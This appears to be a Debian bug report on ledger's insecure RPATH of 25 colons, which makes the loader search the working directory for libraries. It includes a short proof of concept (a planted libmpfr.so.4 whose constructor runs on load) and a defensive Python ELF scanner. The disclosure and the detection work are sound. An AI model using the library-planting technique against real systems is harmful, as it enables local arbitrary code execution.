Source: ledger
Severity: important
Version: 3.0.0+dfsg4-1
Tags: security
/usr/lib/ledger/libledger.so.3 has the following RPATH:
:::::::::::::::::::::::::
(Yes, this is 25 colons.)
RPATH works like $PATH: you can put multiple colon-separated items
there, and an empty item stands for the current working directory. This
means that programs linking to libledger cannot be used securely when
the current working directory is world-writable (for example /tmp). A
local malicious user could plant a crafted library there, tricking the
program into loading arbitrary code.
PoC:
$ gcc -Wall -shared -fPIC moo.c -o libmpfr.so.4
$ ledger
moo!
Aborted
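The following checker is an added example written for this report, not part of the bug report or of any Debian or ledger tooling. It parses the DT_RPATH / DT_RUNPATH tags straight out of a little-endian ELF64 object (no readelf dependency) and classifies each colon-separated entry the way the dynamic loader interprets it: an empty entry means the current working directory, and any other entry that is neither absolute nor a loader token such as $ORIGIN is resolved relative to it. The `build_test_elf` helper fabricates a minimal, non-loadable ELF so the scanner can be exercised offline; the function and constant names are this example's own.

```python
"""Flag DT_RPATH / DT_RUNPATH entries that resolve via the working directory.

Example checker added to this report (not Debian or ledger code); it reads
only the ELF64 section headers it needs and has no third-party dependency.
"""
import struct
import sys

# Constants taken from the ELF64 specification.
SHT_STRTAB, SHT_DYNAMIC = 3, 6
DT_NULL, DT_RPATH, DT_RUNPATH = 0, 15, 29
EHDR = struct.Struct("<16sHHIQQQIHHHHHH")  # Elf64_Ehdr, 64 bytes
SHDR = struct.Struct("<IIQQQQIIQQ")         # Elf64_Shdr, 64 bytes
DYN = struct.Struct("<qQ")                  # Elf64_Dyn, 16 bytes


def _cstring(blob, offset):
    """Read a NUL-terminated string from blob at offset."""
    end = blob.index(b"\0", offset)
    return blob[offset:end].decode("ascii", "replace")


def read_rpaths(elf):
    """Return {"DT_RPATH": str, "DT_RUNPATH": str} for the tags present."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("not a little-endian ELF64 object")
    ehdr = EHDR.unpack_from(elf, 0)
    shoff, shentsize, shnum = ehdr[6], ehdr[11], ehdr[12]
    shdrs = [SHDR.unpack_from(elf, shoff + i * shentsize) for i in range(shnum)]
    found = {}
    for sh in shdrs:
        if sh[1] != SHT_DYNAMIC:
            continue
        strtab = shdrs[sh[6]]              # sh_link points at the .dynstr section
        off, size = sh[4], sh[5]           # sh_offset, sh_size of .dynamic
        for pos in range(off, off + size, DYN.size):
            tag, val = DYN.unpack_from(elf, pos)
            if tag == DT_NULL:
                break
            if tag in (DT_RPATH, DT_RUNPATH):
                name = "DT_RPATH" if tag == DT_RPATH else "DT_RUNPATH"
                found[name] = _cstring(elf, strtab[4] + val)  # strtab[4] = sh_offset
    return found


def unsafe_entries(rpath):
    """Classify each colon-separated search entry as the loader would see it."""
    problems = []
    for entry in rpath.split(":"):
        if entry == "":
            problems.append(("cwd", entry))          # empty entry = working directory
        elif not entry.startswith("/") and not entry.startswith("$"):
            problems.append(("relative", entry))     # resolved relative to cwd
    return problems


def scan(elf_bytes):
    """Return [(tag, kind, entry), ...] findings for one ELF object."""
    return [(tag, kind, entry)
            for tag, rp in read_rpaths(elf_bytes).items()
            for kind, entry in unsafe_entries(rp)]


def build_test_elf(rpath, tag=DT_RPATH):
    """Constructed minimal ELF64 with just .dynstr and .dynamic (not loadable)."""
    dynstr = b"\0" + rpath.encode() + b"\0"      # rpath string sits at offset 1
    dynamic = DYN.pack(tag, 1) + DYN.pack(DT_NULL, 0)
    dynstr_off = EHDR.size
    dynamic_off = dynstr_off + len(dynstr)
    dynamic_off += (-dynamic_off) % 8
    shoff = dynamic_off + len(dynamic)
    shoff += (-shoff) % 8
    shdrs = (SHDR.pack(0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
             + SHDR.pack(1, SHT_STRTAB, 0, 0, dynstr_off, len(dynstr), 0, 0, 1, 0)
             + SHDR.pack(2, SHT_DYNAMIC, 0, 0, dynamic_off, len(dynamic), 1, 0, 8, DYN.size))
    ident = b"\x7fELF\x02\x01\x01" + b"\0" * 9   # ELF64, little-endian, version 1
    ehdr = EHDR.pack(ident, 3, 62, 1, 0, 0, shoff, 0,
                     EHDR.size, 56, 0, SHDR.size, 3, 0)
    body = bytearray(ehdr) + dynstr
    body += b"\0" * (dynamic_off - len(body)) + dynamic
    body += b"\0" * (shoff - len(body)) + shdrs
    return bytes(body)


if __name__ == "__main__":
    # Usage: python3 rpath_check.py /usr/lib/ledger/libledger.so.3
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            for tag, kind, entry in scan(fh.read()):
                print(f"{path}: {tag} entry {entry!r} is {kind}")
```

Run against a real library the script prints one line per offending entry; for the 25-colon RPATH in this report that is 26 "cwd" findings, which is what the dynamic loader will search before falling back to the system directories.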
-- System Information:
Debian Release: jessie/sid
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Kernel: Linux 3.14-2-amd64 (SMP w/1 CPU core)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash
Versions of packages ledger depends on:
ii libboost-filesystem1.55.0 1.55.0+dfsg-2
ii libboost-iostreams1.55.0 1.55.0+dfsg-2
ii libboost-regex1.55.0 1.55.0+dfsg-2
ii libboost-system1.55.0 1.55.0+dfsg-2
ii libc6 2.19-10
ii libgcc1 1:4.9.1-9
ii libgmp10 2:6.0.0+dfsg-6
ii libicu52 52.1-5
ii libmpfr4 3.1.2-1
ii libstdc++6 4.9.1-9
--
Jakub Wilk
#include <stdio.h>
#include <stdlib.h>
/* moo.c: a constructor runs as soon as the dynamic loader maps this
 * library, before ledger's own main(), which is why the output appears
 * immediately and the process then aborts. */
void f() __attribute__((constructor));
void f() { printf("moo!\n"); abort(); }